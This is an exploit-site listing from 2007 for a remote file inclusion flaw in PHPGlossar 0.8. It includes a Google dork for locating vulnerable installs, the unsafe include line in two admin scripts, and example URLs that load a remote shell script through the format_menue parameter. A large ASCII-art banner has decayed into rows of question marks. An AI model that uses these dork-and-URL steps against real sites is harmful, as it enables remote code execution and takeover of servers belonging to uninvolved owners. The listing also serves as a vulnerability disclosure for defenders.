PHPGlossar 0.8 (format_menue) Remote File Inclusion Vulnerabilities

2007-05-16T00:00:00
ID 1337DAY-ID-1882
Type zdt
Reporter kezzap66345
Modified 2007-05-16T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
PHPGlossar 0.8 (format_menue) Remote File Inclusion Vulnerabilities
===================================================================


?????__________________________________________?????
????????_____________________________________???????
???????????_________________________________????????
??????????????_____________________________?????????
????????????????__________________________??????????
???????????????????______________________???????????
?????????????????????___________________????????????
??????????????????????_________________?????????????
????????????????????????_______________?????????????
??????????????????????????_____________?????????????
___?????????????????????????__________??????????????
_____?????????????????????????________??????????????
________???????????????????????_______??????????????
___________??????????????????????_____??????????????
________________???????????????????___??????????????
_____________________???????????????__??????????????
___________________________????????????????????????_
_____________________???????????????????????????____
______________???????????????????????????????_______
___________???????????????????????????????????______
________????????????????????????????????????????____
______????????_____??????????????????????????????___
____?????????_______??????????????????????????????__
__???????????_______???????????????????????????????_
_?????????????_____?????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
_??????????????????????????????????????????????????_
__?????????????????????????????????????????????????_
_____?????????????????????????????????????????????__
_________????????????????????????????????????????___
_______________??????????????????????????????????___
_________________???????????????????????????????____
_________________???????????????????????????________
________________??????????_____??????????___________
_________________?????_________?????_________?????__
__________????_________????____________?????????____
__________?????????????????_____??????????__________
__________?????????????????___?????_________________
__________?????______??????_________________________
Cyber-warrior.org
#PHPGlossar Version 0.8 <=  Remote File Inclusion Vulnerability
#
#Dork:"PHPGlossar Version 0.8"
#
#Vuln Code
##############################################################################################
#
#ERROR1:admin/inc/change_action.php and admin/inc/add.php
#
#<?PHP include ("$format_menue");?>   <<< RFI CODE
#
#
#BUG1:
#
#Example1:http://site.com/path/admin/inc/change_action.php?format_menue=[[Sh3LL
Script]]
#
#Example1:http://site.com/path/admin/inc/add.php?format_menue=[[Sh3LL
Script]]
#
#
#Special Thanks:##### x0r0n ##### ajan
##############################################################################################
##############################################################################################


#  0day.today [2016-04-19]  #